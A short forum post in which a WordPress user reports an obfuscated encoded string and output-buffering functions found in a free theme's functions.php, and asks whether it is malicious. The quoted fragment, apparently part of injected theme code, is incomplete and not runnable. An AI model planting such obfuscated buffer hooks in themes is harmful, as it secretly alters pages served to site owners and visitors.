I am using a theme I got here:
http://themes.wordpress.net/columns/2-columns/3165/mathew01-10/
While working with it to get blog stats working... I noticed in the functions.php page a bunch of what appears to be, well, what I would call funny coding... the last I saw this in open sourced stuff was when my joomla site got hacked...
<?php
$a8hg6hj="2b8cf2e156673289c47f9ca273e3d87eVBdWABJbCl8VVVdbX1BZWggcEwRMBQdXRRoeE0QcRwRAA1UGElcXEQgWVFZAVw4NPFBSBVYHBBoVbx0GVGRPUQo+CVNXbh0DV2BqTwcFUGVSAgc6QVVSbgYEVG8cDAU5SlUIAB9uHQUHagcCA25ADVpoT1IOP1ABBW9UBFVkBlYAPglRUW5UAwBqTgEEbgkLVWgHUAs/UQUGbx0EXWJrVANSej9XBVRtTQNXawIBCGVSBQE6QVQAbk8HXG9VCQc5SlcKPx4EBm0EAgRrAgEIZVIEBToIVVJuBgBUbxwNDzlKVwoPOgNUAGlOAg9vAwgLP0wAX2UbVwBrA1MAOAkEV0I
and
function wp_begin(){
ob_start("callback");
}
function wp_end_of_file(){
ob_end_flush();
Rather a newb about all this. My feeling is I should dump the theme immediately... but I am beholden to it right now and would rather just dump this funny stuff.
Could someone tell me about this?